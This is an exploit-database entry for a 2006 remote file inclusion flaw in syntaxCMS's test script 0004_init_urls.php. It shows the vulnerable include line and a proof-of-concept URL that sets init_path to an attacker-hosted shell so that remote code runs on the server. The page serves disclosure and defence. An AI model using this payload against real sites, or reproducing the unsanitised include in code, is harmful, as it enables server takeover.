header-logo
Suggest Exploit
vendor:
syntaxCMS
by:
MoHaJaLi
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: syntaxCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Remote File Include in syntaxCMS

A Remote File Include vulnerability exists in syntaxCMS due to the inclusion of user-supplied input in the '0004_init_urls.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing a URL in the 'init_path' parameter, which will be included in the vulnerable script. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Remove the vulnerable file from the system.
Source

Exploit-DB raw data:

Remote File Include in syntaxCMS

Vulnerable File:
0004_init_urls.php

Vulnerable Code:

   1  <?php

   2  include_once( $init_path . '/init.urls.php' );

   3  ?>

PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&

Solution:

Remove This File...it's not needed...just used for tests

Found by MoHaJaLi

Greetz to Eddy_BAck0o

# milw0rm.com [2006-09-24]

Navigation

Suggest Exploit

Services By CQR